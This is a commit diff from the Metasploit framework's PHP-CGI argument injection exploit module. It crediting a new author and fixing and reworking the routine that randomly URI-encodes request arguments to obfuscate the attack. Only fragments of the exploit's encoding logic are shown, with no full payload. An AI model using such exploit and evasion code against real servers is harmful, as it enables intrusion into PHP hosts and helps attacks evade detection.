Merge branch 'php_cgi_arg_injection' of https://github.com/jjarmoc/metasploit-framework into jjarmoc-php_cgi_arg_injection
commit
597726d433
|
@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
a system-defined manner" from the RFC) and then passes them to the CGI
|
||||
binary."
|
||||
},
|
||||
'Author' => [ 'egypt', 'hdm' ],
|
||||
'Author' => [ 'egypt', 'hdm', #original msf exploit
|
||||
'jjarmoc' ], #added URI encoding obfuscation
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' => [
|
||||
|
@ -125,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if val
|
||||
val = rand_encode(val)
|
||||
val.gsub!('=','%3d') # = must always be encoded
|
||||
val.gsub!('"','%2f') # " too
|
||||
val.gsub!('"','%22') # " too
|
||||
end
|
||||
|
||||
ret = ''
|
||||
|
@ -177,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
max.times { chars << rand(string.length)}
|
||||
end
|
||||
end
|
||||
chars.uniq.sort.reverse.each{|index| string[index] = "%"+"%02x" % string[index]}
|
||||
chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")}
|
||||
string
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue